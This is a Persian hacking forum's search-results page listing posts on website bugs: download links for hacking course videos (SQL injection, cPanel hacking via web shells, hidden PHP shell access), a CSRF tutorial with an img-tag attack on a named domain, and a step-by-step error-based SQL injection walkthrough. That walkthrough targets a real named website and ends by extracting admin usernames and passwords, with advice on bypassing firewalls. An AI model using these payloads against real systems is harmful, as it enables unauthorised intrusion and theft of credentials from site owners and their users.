رفتن به مطلب



iran rules jazbe modir
ADS mahak

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'انواع باگ'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


انجمن آموزش امنیت و راه های مقابله با نفوذ

  • انجمن های اصلی تیم
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
  • بخش ویژه (مخصوص اعضای ویژه)
  • پروژه های تیم
  • مسابقات
  • عمومی
  • بحث آزاد علمی
  • بخش دریافت
  • آرشیو

جستجو در ...

جستجو به صورت ...


تاریخ ایجاد

  • شروع

    پایان


آخرین به روز رسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


درباره من


جنسیت


محل سکونت

33 نتیجه پیدا شد

  1. باگ چیست ؟ در سال 1945 ماشین حسابی به مشکل بر خورد و از کار افتاد که خانمی با نام گریس هاپر به جستجو و رفع این مشکل پرداخت و شروع به جستجو کرد و جالب است که بدانید مشکل از وجود یک حشره در میان قطعات دستگاه بود و زمانی که ان حشره را از میان قطعات بیرون کشیدند دستگاه مجدد شروع به کار کرد اما امروزه باگ ها به دلیل وجود حشرات نیستند بلکه باگ ها از اشتباهات برنامه نویسان به وجود می اید که باعث به وجود امدن مشکلاتی ازجمله مشکلات امنیتی می شود و هکر ها از این مشکلات امنیتی می توانند استفاده کنند و به هدف دلخواه خود دست پیدا نمایید که در ادامه بیشتر با این موضوع مهم اشنا خواهید شد.
  2. باسلام. دوره آموزشی باگ SQL INJECTION یادگیری تمامی مراحل تزریق کد یادگیری تمامی بایپس ها اموزش به صورت ویدیو قوانین تاپیک : ارسال ممنوع سوال ممنوع اسپم ممنوع رمز فایل ها : www.anonysec.org
  3. etc (Priv8)
  4. http://s9.picofile.com/file/8299544234/Dashtan_Dastresi_makhfi_ba_bargozari_code_php_on_shell.zip.html
  5. 197

    Hacking-Bugs cpanel hacking

    http://s8.picofile.com/file/8299539650/Cpanel_Hacking_ba_Estfade_az_Shell_va_Taghir_email.zip.html
  6. سلام دوستان عزیز در این تایپیک مجموعه آموزش باگ های سایت + کشف باگ سایت لایک فراموش نشود
  7. SHahin Tariki

    Hacking-Bugs معرفی باگ CSRF

    اگر در زمینه نفوذ یا امنیت وب سایت و اپلیکیشن های تحت وب تجربه کار و یا آشنایی داشته باشید، قطعا با عنوان سری حملات باگ CSRF برخورده اید. در این پست شما با این باگ اشنا می کنیم و نحوه استفاده و جلوگیری از آن رو آموزش می دیم CSRF چیست ؟ حملات CSRF مخفف عبارت Cross Site Request Forgery میباشد که در اطلاح و عمل به معنای عبور از درخواست های سایت و ارسال درخواست های جعلی به آن است. فرض کنید در پنل مدیریت سایت شما صفحه ای مربوط به تغییر ایمیل و کلمه عبور وجود دارد شما با وارد کردن رمز عبور و تکرار آن میوانید به سرعت رمز عبور خود را تغییر دهید اما در پشت پرده درخواست شما به سرور ارسال میشود و سرور با استفاده از کوکی های ارسالی توسط مرورگر و بررسی صحت آن ، درخواست شما را میپذیرد و رمز عبورتان تغییر میابد اگر این درخواست از سوی شخص دیگری ارسال گردد از آنجایی که کوکی های ارسالی بی اعتبار است درخواست مربوطه توسط سرور رد میشود. حال اگر این درخواست بدون آنکه متوجه شوید از سوی شما ارسال گردد چه اتفاقی رخ خواهد داد؟ حملات CSRF مرورگر قربانی را وادار به انجام و ارسال دستورات مورد نظر خود ميکند ، البته اين مشکل به علت برنامه نويسی غلط و همين طور استفاده از بعضی توابع شکل ميگيرد با هم مثال زير را مرور و تشريح می کنيم فرض کنید هدف شما دارای یک سیستم خبری هست ، در پنل صفحه برای حذف اخبارتان وجود دارد. قسمتی از کد صفحه حذف خبرها : <?php check_auth(); if(isset($_GET['news'])) { unlink('files/news' .$news.'.txt'); } else { die('File not deleted'); } ?> اسم این فایل برای مثال remove.php است. بدین شکل به عنوان ادمین می توانی ، یک خبر را با دستور Get حذف کنین: https://coco-coder.com/remove.php?news=1 اگر هدف به پنل کاربری خودش وارد شود با باز کردن این لینک مطلب حذف خواهد شد. اما سوال اینجا پیش می آید یک هکر چگونه می تواند از این باگ استفاده کند. کافیه فرمی مخفی در یک صفحه html کار گذاشته بشه که داخل اون فریم ، فرم حذف کردن پست باشه و پس از لود صفحه اون فرم با جاوا اسکریپت ثبت و اجرا می شود مراحل کار ابتدا یک صفحه ساخته و کد زیر را درون آن جای می گذاریم. <img src="www.coco-coder.com/remove.php?news=1" width="2" height="2"> حالا لینک صفحه ای که ساختیم به تارگت خدمون ارسال میکنیم و تارگت بدون این که اطلاعی داشته باشد ، با اجرا کردن صفحه درخواست حذف خبر انجام داده . حفاظت در برابر باگ CSRF پيشنهاداتی براي برنامه نويسان : استفاده از کدهای تایید هویت یا Captcha بررسی و منقضی کردن کوکی ها استفاده از شناسه معتبر یا Valid Token تا جای ممکن از متد GET استفاده نکنید برای اطلاعات حساس ، هرچند متد POST نیز از این قاعده به دور نیست. موفق باشید...
  8. Moeein Seven

    Hacking-Bugs آموزش باگ cgi (ویدیو)

    باسلام آموزش باگ cgi ریکورد شده مخصوص تیم. رمز فایل anonysec.org http://s9.picofile.com/file/8298804268/cgi.mp4.html
  9. Moeein Seven

    Hacking-Bugs آموزش باگ xampp (ویدیو)

    باسلام آموزش باگ xampp ریکورد شده مخصوص تیم. رمز فایل anonysec.org http://s8.picofile.com/file/8298646634/xampp.mp4.html
  10. به نام خدا سلام خدمت دوستان محترم تو این پست میخوایم یک روش اینجکت کردن به روش xpath رو با هم یاد بگیریم... در این روش میشه گفت تقریبا اگر خواستید یه تارگت رو تست SQL بزنید و تارگت ارور مورد نظرو نشون نداد یا به کدای معمولی اینجکت نشد میتونید ازین روش استفاده کنید که تقریبا تو 90 درصد تارگت ها جواب میده... خوب برای مثال تارگت ما سایت زیر هست : www.isei.dk/index.php?pageid=3 خوب مثلا ما اومدیم این سایتو چک کردیم حالا با روشهای مختلف و فهمیدیم که یا خطای SQL نمیده . در اینجا نمیشه گفت سایت باگ نداره برای مثلا فرض میکنیم که خطای SQL هم گرفتیم حالا اگر فایروال سرور دستورات مارو بلاک کنه چی ؟ قاعدتا بای پس کردن خیلی زمانبر و خسته کنندس البته بیشتر وقتا خیلی میتونه مفید باشه . بگذریم ادامه میدیم به اینجکت کردن تارگت مورد نظر : www.isei.dk/index.php?pageid=-3' and extractvalue(rand(),concat(0x0a,@Version))-- - خوب همانطور که در دستور بالا میبینید ما نه از دستور order by و نه حتی union select برای پیدا کردن کالمن اسیب پذیر استفاده کردیم پس چی میشه ؟ خوب xpath اینجوریه که دستورات مارو برای مثال من اینجا خواستم ورژن SQL رو بگیرم میاد توی کالمن اسیب پذیر نشون میده و نیازی به پیدا کردن تعدا کالمن ها نیست . خوب برای دستورات بعدی هم همینطور : www.isei.dk/index.php?pageid=-3' and extractvalue(rand(),concat(0x0a,Database())-- - خوب اینم که سادس دیگه من اومدم با این کار اسم دیتابیس و گرفتم . ادامه : www.isei.dk/index.php?pageid=-3' and extractvalue(rand(),concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit 0,1))-- - فک نکنم نیاز به توضیح برای حرفه ایا نباشه دیگه ولی برای دوستانی که تازه شروع کردن میشه گفت که با اینکار میایم تیبل های تارگتمونو در میاریم با این تفاوت که از متد جدید استفاده میکنیم و یه نکته اییم که باید اینجا بگم اینه که دستور limit 0,1 که من نوشتم به این خاطر هست که محدوده مشخص کنیم براش مثلا اگر الان دستور بالارو اجرا کنید میبینید که تیبل اول رو نمایش میده و به همین ترتیب برای تیبل های بعدی limit 1,1,limit 2,1 تا به تیبل مورد نظر برسیم اگر به جایی برسیم که داخل صفحه چیزی نیاد یه به اصطلاح none بشه یعنی دیگه تیبلی نداریم. مثلا من تیبل ادمین رو در limit 3,1 پیدا کردم میام اینجوری کالمن هاشو در میارم : www.isei.dk/index.php?pageid=-3' and extractvalue(rand(),concat(0x0a,(select column_name from information_schema.columns where table_name="admin_tab" limit 0,1))-- - شاید سوال پیش بیاد که چرا مقدار limit دوباره به 0و1 برگشت . باید بگم که چون اینجوری ما میایم اولین کالمن از تیبل ادمین رو در میاریم و نمایش میدیم که برای کالمن های یوزر پس که بیشتر مواقع مد نظرمون هست مقدار limit تغییر میکنه . فک کنم نیازی نباشه که بگم مقدار limit به این خاطر از 0 شروع میشه که توی برنامه نویسی برای شمارش به جای 1 از 0 استفاده میکنیم . ادامه : www.isei.dk/index.php?pageid=-3' and extractvalue(rand(),concat(0x0a,(select USERNAME from admin_tab limit 0,1))-- - همچنین برای پسورد : www.isei.dk/index.php?pageid=-3' and extractvalue(rand(),concat(0x0a,(select PASS_WORD from admin_tab limit 0,1))-- - همانطور که دیدید سختی و پیچیدگی چندانی نداره و توصیه میکنم وقتی با تارگتی مواجه می شید و در مرحله اول دیدید دستوراتتون ریدایرکت یا با بلوکه میشه سریع نرید سر تارگت بعدی یکم روش کار کنید مطمئن باشید حتما به نتیجه مطلوب خواهید رسید . در ضمن توجه کنید که درسته توی این متد کارتون راحت تر میشه ولی گاهی اوقات می بینید که سرورتون فایروال سرسختی داره و باید بایپس کنید که توی این روش هم مثل روش معمولی میتونید از بای پس های waf استفاده کنید که خود بایپس کردن هم بستگی به خلاقیت و هنر هکر داره و توصیه میکنم روی بای پس ها زیاد کار کنید چون اینجوری تقریبا هیچوقت پشت یه تارگت نمیمونید . امیدوارم موفق باشید.
×
×
  • جدید...